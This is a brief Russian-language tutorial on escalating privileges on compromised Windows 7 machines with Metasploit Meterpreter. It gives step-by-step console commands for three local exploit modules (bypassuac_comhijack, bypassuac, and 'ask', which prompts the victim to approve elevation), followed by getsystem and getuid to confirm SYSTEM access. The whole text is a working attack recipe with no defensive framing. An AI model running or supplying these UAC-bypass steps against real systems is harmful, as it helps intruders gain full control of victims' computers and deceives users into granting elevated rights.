Управление доступом. Повышение привилегий доступа
Sam Sepiolgetuid
getsystem - повышает привилегии пользователя
но это не всегда срабатывает.
Для этого используем саму уязвимость системы:
рассмотрим два эксплоита которые работают на многих системах windows 7.
первый:
переключим meterpreter в фоновый режим:
background
use exploit/windows/local/bypassuac_comhijack
show options
нам нужно установить параметр SESSION. Это номер сессии под которой работает meterpreter
set session 2
run
getsystem
getuid
второй:
use exploit/windows/local/bypassuac
show options
set session 2
run
getsystem
getuid
еще один способ:
Как бы просим пользователя на повышение привелегий.
idletime - покажет активен ли пользователь в данный момент
use exploit/windows/local/ask
show options
set session 2
set technique PSH
run
пользователю выдаст сообщение для повышения привилегий.